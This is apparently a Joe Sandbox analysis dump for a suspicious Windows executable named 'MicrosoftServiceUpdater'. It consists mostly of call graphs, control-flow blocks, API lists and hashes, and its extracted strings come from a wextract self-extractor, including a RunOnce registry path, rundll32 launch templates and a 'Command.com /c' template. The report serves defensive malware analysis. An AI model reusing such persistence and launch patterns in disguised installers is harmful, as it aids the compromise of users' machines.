3094->3095 3097 7ff636342d54 3095->3097 3096->3094 3105 7ff636342b50 3096->3105 3097->3025 3098 7ff636342b54 IsDBCSLeadByte 3098->3105 3099 7ff636342b79 CharNextA CharUpperA 3101 7ff636342c6d CharUpperA 3099->3101 3099->3105 3100 7ff636342d13 CharNextA 3102 7ff636342d25 CharNextA 3100->3102 3101->3105 3102->3094 3102->3098 3104 7ff636342bbe CharPrevA 3104->3105 3105->3098 3105->3099 3105->3100 3105->3102 3105->3104 3111 7ff636347ea0 3105->3111 3107 7ff636347f60 3106->3107 3108 7ff636347f99 3107->3108 3109 7ff636347f6a IsDBCSLeadByte 3107->3109 3110 7ff636347f82 CharNextA 3107->3110 3108->3085 3109->3107 3109->3108 3110->3107 3112 7ff636347eb8 3111->3112 3112->3112 3113 7ff636347ec1 CharPrevA 3112->3113 3114 7ff636347edd CharPrevA 3113->3114 3115 7ff636347ed5 3114->3115 3116 7ff636347ef4 3114->3116 3115->3114 3117 7ff636347efe CharPrevA 3115->3117 3116->3117 3118 7ff636347f27 3116->3118 3119 7ff636347f15 CharNextA 3116->3119 3117->3118 3117->3119 3118->3105 3119->3118 3120->3063 3121->2876 3123 7ff636342349 RegQueryInfoKeyA RegCloseKey 3122->3123 3124 7ff6363423ad 3122->3124 3123->3124 3124->2528 3126 7ff6363422db 3125->3126 3127 7ff636342271 3125->3127 3129 7ff6363486f0 7 API calls 3126->3129 3128 7ff636347e08 CharPrevA 3127->3128 3130 7ff636342284 WritePrivateProfileStringA _lopen 3128->3130 3131 7ff6363422ed 3129->3131 3130->3126 3132 7ff6363422b7 _llseek _lclose 3130->3132 3131->2528 3132->3126 2235 7ff636345af1 2236 7ff636345b3c 2235->2236 2237 7ff636345b25 2235->2237 2239 7ff636345c36 2236->2239 2242 7ff636345b33 2236->2242 2244 7ff636345b52 2236->2244 2238 7ff6363459b0 CloseHandle 2237->2238 2237->2242 2238->2242 2243 7ff636345c42 SetDlgItemTextA 2239->2243 2245 7ff636345c57 2239->2245 2291 7ff6363486f0 2242->2291 2243->2245 2244->2242 2246 7ff636345b93 DosDateTimeToFileTime 2244->2246 2245->2242 2263 7ff6363453b8 GetFileAttributesA 2245->2263 2246->2242 2248 7ff636345bb0 LocalFileTimeToFileTime 2246->2248 2248->2242 2250 7ff636345bce SetFileTime 2248->2250 2250->2242 2251 7ff636345bf6 2250->2251 2260 7ff6363459b0 2251->2260 2256 7ff636345ca8 2282 7ff636345478 LocalAlloc 2256->2282 2261 7ff6363459cf SetFileAttributesA 2260->2261 2262 7ff6363459e4 CloseHandle 2260->2262 2261->2242 2262->2261 2264 7ff63634545b 2263->2264 2265 7ff6363453da 2263->2265 2264->2242 2270 7ff6363455c0 2264->2270 2265->2264 2266 7ff636345442 SetFileAttributesA 2265->2266 2299 7ff636347d28 FindResourceA 2265->2299 2266->2264 2269 7ff636345438 2269->2266 2271 7ff6363455f3 2270->2271 2272 7ff63634563d lstrcmpA 2271->2272 2273 7ff636345610 2271->2273 2275 7ff636345634 2272->2275 2276 7ff636345694 2272->2276 2274 7ff636344f2c 24 API calls 2273->2274 2274->2275 2275->2242 2275->2256 2276->2275 2277 7ff6363456e8 CreateFileA 2276->2277 2277->2275 2279 7ff63634571e 2277->2279 2278 7ff6363457a1 CreateFileA 2278->2275 2279->2275 2279->2278 2280 7ff636345789 CharNextA 2279->2280 2281 7ff636345772 CreateDirectoryA 2279->2281 2280->2279 2281->2280 2283 7ff6363454a6 2282->2283 2284 7ff6363454d0 LocalAlloc 2282->2284 2285 7ff636344f2c 24 API calls 2283->2285 2287 7ff6363454ff 2284->2287 2290 7ff6363454c9 2284->2290 2285->2290 2288 7ff636344f2c 24 API calls 2287->2288 2289 7ff636345522 LocalFree 2288->2289 2289->2290 2290->2242 2292 7ff6363486f9 2291->2292 2293 7ff636345cdb 2292->2293 2294 7ff636348750 RtlCaptureContext RtlLookupFunctionEntry 2292->2294 2295 7ff6363487d7 2294->2295 2296 7ff636348795 RtlVirtualUnwind 2294->2296 2354 7ff636348714 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2295->2354 2296->2295 2300 7ff636347dc3 2299->2300 2301 7ff636347d63 LoadResource 2299->2301 2307 7ff636344f2c 2300->2307 2301->2300 2303 7ff636347d7d DialogBoxIndirectParamA FreeResource 2301->2303 2303->2300 2305 7ff636345424 2303->2305 2305->2264 2305->2266 2305->2269 2308 7ff636345105 2307->2308 2309 7ff636344fa5 LoadStringA 2307->2309 2312 7ff6363486f0 7 API calls 2308->2312 2310 7ff636345011 2309->2310 2311 7ff636344fcf 2309->2311 2314 7ff63634508d 2310->2314 2318 7ff63634501d LocalAlloc 2310->2318 2336 7ff636348154 2311->2336 2315 7ff6363451dd 2312->2315 2320 7ff6363450e6 LocalAlloc 2314->2320 2321 7ff6363450a0 LocalAlloc 2314->2321 2315->2305 2317 7ff636344fdd MessageBoxA 2317->2308 2318->2308 2325 7ff636345070 2318->2325 2320->2308 2331 7ff636345088 MessageBeep 2320->2331 2321->2308 2327 7ff6363450d1 2321->2327 2351 7ff6363410bc 2325->2351 2330 7ff6363410bc _vsnprintf 2327->2330 2329 7ff636348154 13 API calls 2332 7ff636345173 2329->2332 2330->2331 2331->2329 2334 7ff636348084 2 API calls 2332->2334 2335 7ff63634517c MessageBoxA LocalFree 2332->2335 2334->2335 2335->2308 2337 7ff636348194 GetVersionExA 2336->2337 2346 7ff6363482c6 2336->2346 2338 7ff6363481bd 2337->2338 2337->2346 2341 7ff6363481e0 GetSystemMetrics 2338->2341 2338->2346 2339 7ff6363486f0 7 API calls 2340 7ff636344fd4 2339->2340 2340->2317 2347 7ff636348084 2340->2347 2342 7ff6363481f7 RegOpenKeyExA 2341->2342 2341->2346 2343 7ff63634822c RegQueryValueExA RegCloseKey 2342->2343 2342->2346 2344 7ff636348276 2343->2344 2343->2346 2345 7ff6363482b5 CharNextA 2344->2345 2344->2346 2345->2344 2346->2339 2348 7ff63634812d 2347->2348 2349 7ff6363480aa EnumResourceLanguagesA 2347->2349 2348->2317 2349->2348 2350 7ff6363480ef EnumResourceLanguagesA 2349->2350 2350->2348 2352 7ff6363410eb _vsnprintf 2351->2352 2353 7ff6363410dc 2351->2353 2352->2353 2353->2331 3279 7ff636345aae GlobalAlloc 3280 7ff63634146e 3281 7ff6363414c7 GetDesktopWindow 3280->3281 3282 7ff6363414a0 3280->3282 3283 7ff636344dc8 14 API calls 3281->3283 3284 7ff6363414c3 3282->3284 3286 7ff6363414b2 EndDialog 3282->3286 3285 7ff6363414de LoadStringA SetDlgItemTextA MessageBeep 3283->3285 3287 7ff6363486f0 7 API calls 3284->3287 3285->3284 3286->3284 3288 7ff636341540 3287->3288 3289 7ff63634366e 3290 7ff636343697 3289->3290 3291 7ff636343946 EndDialog 3289->3291 3293 7ff6363436a7 3290->3293 3294 7ff6363438c2 GetDesktopWindow 3290->3294 3292 7ff6363436ab 3291->3292 3293->3292 3296 7ff6363436bb 3293->3296 3297 7ff636343775 GetDlgItemTextA 3293->3297 3295 7ff636344dc8 14 API calls 3294->3295 3298 7ff6363438d9 SetWindowTextA SendDlgItemMessageA 3295->3298 3299 7ff636343758 EndDialog 3296->3299 3300 7ff6363436c4 3296->3300 3307 7ff63634379e 3297->3307 3321 7ff636343829 3297->3321 3298->3292 3301 7ff63634391c GetDlgItem EnableWindow 3298->3301 3299->3292 3300->3292 3302 7ff6363436d1 LoadStringA 3300->3302 3301->3292 3303 7ff6363436fd 3302->3303 3304 7ff63634371e 3302->3304 3308 7ff636344f2c 24 API calls 3303->3308 3326 7ff636344b70 LoadLibraryA 3304->3326 3306 7ff636344f2c 24 API calls 3306->3292 3310 7ff6363437d4 GetFileAttributesA 3307->3310 3307->3321 3325 7ff636343717 3308->3325 3311 7ff6363437e8 3310->3311 3312 7ff63634383a 3310->3312 3314 7ff636344f2c 24 API calls 3311->3314 3316 7ff636347e08 CharPrevA 3312->3316 3313 7ff63634372b SetDlgItemTextA 3313->3292 3313->3303 3317 7ff63634380b 3314->3317 3315 7ff63634388f EndDialog 3315->3292 3318 7ff63634384e 3316->3318 3317->3292 3319 7ff636343814 CreateDirectoryA 3317->3319 3320 7ff636346d9c 31 API calls 3318->3320 3319->3312 3319->3321 3322 7ff636343856 3320->3322 3321->3306 3322->3321 3323 7ff636343861 3322->3323 3324 7ff636346f14 38 API calls 3323->3324 3324->3325 3325->3292 3325->3315 3327 7ff636344bb4 GetProcAddress 3326->3327 3330 7ff636344d7f 3326->3330 3328 7ff636344d69 FreeLibrary 3327->3328 3329 7ff636344bd6 GetProcAddress 3327->3329 3328->3330 3329->3328 3331 7ff636344bfb GetProcAddress 3329->3331 3332 7ff636344f2c 24 API calls 3330->3332 3331->3328 3333 7ff636344c1d 3331->3333 3334 7ff636343723 3332->3334 3335 7ff636344c31 GetTempPathA 3333->3335 3340 7ff636344c7f FreeLibrary 3333->3340 3334->3292 3334->3313 3336 7ff636344c46 3335->3336 3336->3336 3337 7ff636344c4e CharPrevA 3336->3337 3338 7ff636344c68 CharPrevA 3337->3338 3337->3340 3338->3340 3340->3334 3341 7ff636348df0 _XcptFilter

                                                                                                                                                                                          Callgraph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          • Opacity -> Relevance
                                                                                                                                                                                          • Disassembly available
                                                                                                                                                                                          callgraph 0 Function_00007FF636345478 71 Function_00007FF636344F2C 0->71 1 Function_00007FF636345F80 27 Function_00007FF636345E44 1->27 47 Function_00007FF6363451F8 1->47 1->71 2 Function_00007FF636343C80 3 Function_00007FF63634397E 85 Function_00007FF636344DC8 3->85 4 Function_00007FF636345F7E 4->27 4->47 4->71 5 Function_00007FF636347984 78 Function_00007FF6363410BC 5->78 102 Function_00007FF6363486F0 5->102 6 Function_00007FF636348084 7 Function_00007FF636348A92 8 Function_00007FF636342490 8->71 8->102 9 Function_00007FF63634868E 10 Function_00007FF636346294 37 Function_00007FF636347958 10->37 10->47 10->71 11 Function_00007FF636342898 26 Function_00007FF636342644 11->26 12 Function_00007FF636346D9C 12->37 52 Function_00007FF636347E08 12->52 12->71 13 Function_00007FF63634729C 14 Function_00007FF636347EA0 15 Function_00007FF636348BA0 16 Function_00007FF6363459A9 17 Function_00007FF6363465A8 17->52 17->78 17->102 18 Function_00007FF636348AA8 31 Function_00007FF636348A4C 18->31 19 Function_00007FF6363459B0 20 Function_00007FF636347AAF 21 Function_00007FF636345AAE 22 Function_00007FF6363441B4 23 Function_00007FF636344838 22->23 32 Function_00007FF636347C50 22->32 22->37 22->47 22->52 56 Function_00007FF636341D10 22->56 22->71 22->78 100 Function_00007FF6363415F4 22->100 22->102 23->37 23->71 81 Function_00007FF6363423C0 23->81 23->102 24 Function_00007FF636348D3C 25 Function_00007FF636344B3B 26->52 26->102 27->19 80 Function_00007FF6363455C0 27->80 27->102 28 Function_00007FF636348049 29 Function_00007FF63634874B 57 Function_00007FF636348714 29->57 30 Function_00007FF636347F48 32->52 32->102 33 Function_00007FF636348154 33->102 34 Function_00007FF636343A4E 34->2 34->71 34->85 35 Function_00007FF636344A54 35->47 35->71 36 Function_00007FF636341258 72 Function_00007FF636341130 36->72 36->102 38 Function_00007FF636341558 38->30 39 Function_00007FF63634845E 42 Function_00007FF636348B60 39->42 43 Function_00007FF636342D70 39->43 40 Function_00007FF636344064 40->37 40->47 70 Function_00007FF636347D28 40->70 40->71 41 Function_00007FF636348460 41->42 41->43 99 Function_00007FF636348BF4 41->99 61 Function_00007FF636348B10 42->61 83 Function_00007FF636348BC0 42->83 60 Function_00007FF636343214 43->60 43->71 43->81 93 Function_00007FF6363463DC 43->93 94 Function_00007FF636342EDC 43->94 101 Function_00007FF636341BF4 43->101 44 Function_00007FF636344B70 44->71 45 Function_00007FF63634146E 45->85 45->102 46 Function_00007FF63634366E 46->12 46->44 46->52 59 Function_00007FF636346F14 46->59 46->71 46->85 48 Function_00007FF636345CFC 49 Function_00007FF636348D02 49->24 50 Function_00007FF636348B00 51 Function_00007FF636348400 53 Function_00007FF636341008 52->53 54 Function_00007FF636342308 55 Function_00007FF636346710 55->12 55->17 55->37 55->52 55->59 55->102 56->52 56->71 56->78 56->102 58 Function_00007FF636347B0F 58->52 58->102 59->37 62 Function_00007FF636342520 59->62 59->71 59->102 60->1 60->5 60->10 60->22 60->35 60->37 60->40 60->52 60->59 60->70 60->71 60->81 91 Function_00007FF6363461D4 60->91 98 Function_00007FF6363468F0 60->98 60->102 62->71 62->78 62->102 63 Function_00007FF636347320 63->13 63->30 63->52 77 Function_00007FF636347FB8 63->77 82 Function_00007FF636341BC0 63->82 86 Function_00007FF6363488C8 63->86 63->102 64 Function_00007FF636345820 65 Function_00007FF63634351E 65->85 66 Function_00007FF636345A1E 67 Function_00007FF63634831E 67->18 67->50 68 Function_00007FF636348A1E 69 Function_00007FF636348E20 70->71 71->6 71->33 71->78 71->102 72->102 73 Function_00007FF636342034 73->52 73->53 73->73 73->102 74 Function_00007FF636342234 74->52 74->102 75 Function_00007FF636343D34 75->6 75->11 75->33 75->71 75->102 76 Function_00007FF6363453B8 76->70 79 Function_00007FF6363455BA 79->71 80->71 81->54 81->74 82->71 84 Function_00007FF636348CCA 85->102 86->57 87 Function_00007FF636345ACA 88 Function_00007FF6363458D0 88->2 89 Function_00007FF6363434CE 90 Function_00007FF6363489CE 91->5 91->47 91->71 92 Function_00007FF6363452D4 92->53 93->14 93->73 93->102 94->36 94->47 94->63 94->70 94->71 94->73 94->75 94->102 95 Function_00007FF636342AE8 95->14 95->102 96 Function_00007FF636345AEA 97 Function_00007FF636345AF1 97->0 97->19 97->48 97->76 97->80 97->92 97->102 98->8 98->37 98->47 98->52 98->55 98->59 98->70 98->71 98->102 100->38 100->52 100->53 100->71 100->77 100->78 100->95 100->102 101->71 101->102 102->57 103 Function_00007FF636348DF0

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 0 7ff6363441b4-7ff636344206 1 7ff636344229-7ff636344231 0->1 2 7ff636344208-7ff636344223 call 7ff6363451f8 0->2 3 7ff636344235-7ff636344257 memset 1->3 2->1 8 7ff63634434a-7ff636344373 call 7ff636344f2c 2->8 5 7ff636344378-7ff63634438b 3->5 6 7ff63634425d-7ff636344278 call 7ff6363451f8 3->6 10 7ff63634438f-7ff636344399 5->10 6->8 17 7ff63634427e-7ff636344284 6->17 23 7ff6363445e9 8->23 11 7ff6363443ad-7ff6363443b8 10->11 12 7ff63634439b-7ff6363443a1 10->12 16 7ff6363443bb-7ff6363443be 11->16 12->11 15 7ff6363443a3-7ff6363443ab 12->15 15->10 15->11 19 7ff6363443c0-7ff6363443d8 call 7ff6363451f8 16->19 20 7ff63634441e-7ff636344433 call 7ff6363415f4 16->20 21 7ff636344286-7ff63634428b 17->21 22 7ff63634428d-7ff636344290 17->22 19->8 36 7ff6363443de-7ff6363443e5 19->36 20->23 37 7ff636344439-7ff636344440 20->37 26 7ff6363442a5 21->26 27 7ff63634429d-7ff63634429f 22->27 28 7ff636344292-7ff63634429b 22->28 24 7ff6363445eb-7ff63634461a call 7ff6363486f0 23->24 32 7ff6363442a8-7ff6363442ab 26->32 27->32 33 7ff6363442a1 27->33 28->26 32->16 38 7ff6363442b1-7ff6363442bb 32->38 33->26 39 7ff6363443eb-7ff636344418 CompareStringA 36->39 40 7ff6363446d3-7ff6363446da 36->40 41 7ff636344460-7ff636344462 37->41 42 7ff636344442-7ff636344449 37->42 43 7ff636344327-7ff63634432a 38->43 44 7ff6363442bd-7ff6363442c0 38->44 39->20 39->40 45 7ff636344828-7ff63634482a 40->45 46 7ff6363446e0-7ff6363446e7 40->46 47 7ff636344468-7ff63634446f 41->47 48 7ff636344593-7ff63634459f call 7ff636344838 41->48 42->41 50 7ff63634444b-7ff636344452 42->50 43->20 49 7ff636344330-7ff636344348 call 7ff6363451f8 43->49 51 7ff6363442cb-7ff6363442cd 44->51 52 7ff6363442c2-7ff6363442c9 44->52 45->24 46->45 54 7ff6363446ed-7ff63634471c RegOpenKeyExA 46->54 56 7ff636344475-7ff636344477 47->56 57 7ff636344694-7ff6363446ce call 7ff636344f2c LocalFree 47->57 65 7ff6363445a4-7ff6363445a6 48->65 49->8 49->16 50->41 60 7ff636344454-7ff636344456 50->60 51->23 55 7ff6363442d3 51->55 53 7ff6363442da-7ff6363442eb call 7ff6363451f8 52->53 53->8 78 7ff6363442ed-7ff63634431d CompareStringA 53->78 54->45 62 7ff636344722-7ff636344761 RegQueryValueExA 54->62 55->53 56->48 64 7ff63634447d-7ff636344484 56->64 57->23 60->47 61 7ff636344458-7ff63634445b call 7ff636341d10 60->61 61->41 69 7ff636344817-7ff636344823 RegCloseKey 62->69 70 7ff636344767-7ff636344796 memset GetSystemDirectoryA 62->70 64->48 72 7ff63634448a-7ff636344495 call 7ff636347c50 64->72 73 7ff6363445a8-7ff6363445be LocalFree 65->73 74 7ff6363445da-7ff6363445e4 LocalFree 65->74 69->45 76 7ff636344798-7ff6363447a9 call 7ff636347e08 70->76 77 7ff6363447ae-7ff6363447d7 call 7ff6363410bc 70->77 86 7ff63634449b-7ff6363444b7 GetProcAddress 72->86 87 7ff63634466f-7ff636344692 call 7ff636344f2c 72->87 73->40 80 7ff6363445c4-7ff6363445c9 73->80 74->23 76->77 88 7ff6363447de-7ff6363447e5 77->88 78->43 82 7ff63634431f-7ff636344322 78->82 80->3 82->20 89 7ff6363444bd-7ff63634450b 86->89 90 7ff63634461c-7ff636344649 call 7ff636344f2c FreeLibrary 86->90 98 7ff63634464e-7ff63634466a LocalFree call 7ff636347958 87->98 88->88 93 7ff6363447e7-7ff636344812 RegSetValueExA 88->93 94 7ff63634450d-7ff636344511 89->94 95 7ff636344515-7ff63634451d 89->95 90->98 93->69 94->95 99 7ff636344527-7ff636344529 95->99 100 7ff63634451f-7ff636344523 95->100 98->23 102 7ff63634452b-7ff63634452f 99->102 103 7ff636344533-7ff63634453b 99->103 100->99 102->103 104 7ff63634453d-7ff636344541 103->104 105 7ff636344545-7ff636344547 103->105 104->105 107 7ff636344549-7ff63634454d 105->107 108 7ff636344551-7ff63634457e 105->108 107->108 110 7ff636344580-7ff636344591 FreeLibrary 108->110 111 7ff6363445ce-7ff6363445d5 FreeLibrary 108->111 110->73 111->74
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                          • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$one$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                                                                                                          • API String ID: 2679723528-847906607
                                                                                                                                                                                          • Opcode ID: effdab913d68b8f5cb6356f1f4624d08c697481126c570b33e8394dce573185e
                                                                                                                                                                                          • Instruction ID: cd0304a5de650df130ba20bcdecdeb9157e235e55dc1c0dcd098c4077a63d176
                                                                                                                                                                                          • Opcode Fuzzy Hash: effdab913d68b8f5cb6356f1f4624d08c697481126c570b33e8394dce573185e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 81029072A0864286FB628F21E840AB9BBA0FF85744F406135DA4DC37A5DFBFE545E710

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery
                                                                                                                                                                                          • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                                                                                                          • API String ID: 1522771004-2841110139
                                                                                                                                                                                          • Opcode ID: 2b53b3767e793faff65087a239a43c24df66161b19351fe183ebef1a3c7f0936
                                                                                                                                                                                          • Instruction ID: 63261e27eca148c525f23557f0d49a2daefef1b738ab41c8f9a7e1210775e686
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b53b3767e793faff65087a239a43c24df66161b19351fe183ebef1a3c7f0936
                                                                                                                                                                                          • Instruction Fuzzy Hash: 63819336A18B8586F7128F21E850AB9FBA0FB89B54F446231DA4E83794DFBFD505D700

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 144 7ff6363415f4-7ff636341646 145 7ff636341649-7ff636341653 144->145 146 7ff636341668-7ff63634167a 145->146 147 7ff636341655-7ff63634165b 145->147 149 7ff636341689-7ff636341690 146->149 150 7ff63634167c-7ff636341687 146->150 147->146 148 7ff63634165d-7ff636341666 147->148 148->145 148->146 151 7ff636341694-7ff6363416b2 call 7ff636341558 149->151 150->151 154 7ff63634171e-7ff636341730 151->154 155 7ff6363416b4 151->155 156 7ff636341735-7ff63634173f 154->156 157 7ff6363416b7-7ff6363416be 155->157 159 7ff636341741-7ff636341747 156->159 160 7ff636341754-7ff63634176d call 7ff636347e08 156->160 157->157 158 7ff6363416c0-7ff6363416c4 157->158 158->154 161 7ff6363416c6-7ff6363416cd 158->161 159->160 162 7ff636341749-7ff636341752 159->162 164 7ff636341772-7ff636341782 call 7ff636347fb8 160->164 165 7ff6363416cf-7ff6363416d2 161->165 166 7ff6363416d4-7ff6363416d6 161->166 162->156 162->160 172 7ff636341788-7ff6363417b5 CompareStringA 164->172 173 7ff6363419d3-7ff6363419e3 call 7ff636347fb8 164->173 165->166 168 7ff6363416dc-7ff6363416ec 165->168 166->154 169 7ff6363416d8-7ff6363416da 166->169 171 7ff6363416ef-7ff6363416f9 168->171 169->154 169->168 174 7ff6363416fb-7ff636341701 171->174 175 7ff63634170e-7ff63634171c 171->175 172->173 177 7ff6363417bb-7ff6363417cf GetFileAttributesA 172->177 182 7ff6363419e9-7ff636341a16 CompareStringA 173->182 183 7ff636341a83-7ff636341aa1 LocalAlloc 173->183 174->175 178 7ff636341703-7ff63634170c 174->178 175->164 180 7ff6363419ab-7ff6363419b3 177->180 181 7ff6363417d5-7ff6363417dd 177->181 178->171 178->175 185 7ff6363419b8-7ff6363419ce call 7ff636344f2c 180->185 181->180 184 7ff6363417e3-7ff6363417ff call 7ff636341558 181->184 182->183 186 7ff636341a18-7ff636341a1f 182->186 188 7ff636341a5a-7ff636341a65 183->188 189 7ff636341aa3-7ff636341ab7 GetFileAttributesA 183->189 199 7ff636341801-7ff63634181e call 7ff636341558 184->199 200 7ff636341823-7ff636341841 LocalAlloc 184->200 197 7ff636341b8f-7ff636341bb8 call 7ff6363486f0 185->197 191 7ff636341a22-7ff636341a29 186->191 188->185 193 7ff636341ab9-7ff636341abb 189->193 194 7ff636341b36-7ff636341b40 189->194 191->191 198 7ff636341a2b 191->198 193->194 196 7ff636341abd-7ff636341ace 193->196 201 7ff636341b47-7ff636341b51 194->201 202 7ff636341ad5-7ff636341adf 196->202 204 7ff636341a30-7ff636341a37 198->204 199->200 200->188 206 7ff636341847-7ff6363418c3 GetPrivateProfileIntA GetPrivateProfileStringA 200->206 207 7ff636341b65-7ff636341b70 201->207 208 7ff636341b53-7ff636341b58 201->208 210 7ff636341ae1-7ff636341ae7 202->210 211 7ff636341af4-7ff636341b05 202->211 204->204 213 7ff636341a39-7ff636341a58 LocalAlloc 204->213 214 7ff636341940-7ff63634194f 206->214 215 7ff6363418c5-7ff6363418d4 206->215 209 7ff636341b73-7ff636341b7d call 7ff636342ae8 207->209 208->207 216 7ff636341b5a-7ff636341b63 208->216 224 7ff636341b82-7ff636341b8c 209->224 210->211 218 7ff636341ae9-7ff636341af2 210->218 211->209 219 7ff636341b07-7ff636341b0a 211->219 213->188 222 7ff636341a6a-7ff636341a7e call 7ff6363410bc 213->222 220 7ff636341951-7ff636341971 GetShortPathNameA 214->220 221 7ff636341973 214->221 223 7ff6363418d7-7ff6363418e1 215->223 216->201 216->207 218->202 218->211 219->209 225 7ff636341b0c-7ff636341b34 call 7ff636341008 * 2 219->225 226 7ff63634197a-7ff6363419a6 call 7ff6363410bc 220->226 221->226 222->224 228 7ff6363418f6-7ff63634190c 223->228 229 7ff6363418e3-7ff6363418e9 223->229 224->197 225->209 226->224 231 7ff63634190f-7ff636341919 228->231 229->228 230 7ff6363418eb-7ff6363418f4 229->230 230->223 230->228 235 7ff63634192d-7ff63634193b 231->235 236 7ff63634191b-7ff636341920 231->236 235->224 236->235 239 7ff636341922-7ff63634192b 236->239 239->231 239->235
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                          • String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                          • API String ID: 383838535-1780657946
                                                                                                                                                                                          • Opcode ID: 8e0407103e11ce51f126bab25aa3897bdba1f67ced2c29782eb1cc7dcba1f919
                                                                                                                                                                                          • Instruction ID: 99bf1cc1c770e9e50726da4532e3288d4b2cbf07b23b455e49bb29a2b54580e0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e0407103e11ce51f126bab25aa3897bdba1f67ced2c29782eb1cc7dcba1f919
                                                                                                                                                                                          • Instruction Fuzzy Hash: 91F19E62B0CB8285FE128F25E440AB9BBA1FB45784F946135DA4D83795DFBFE509D300

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
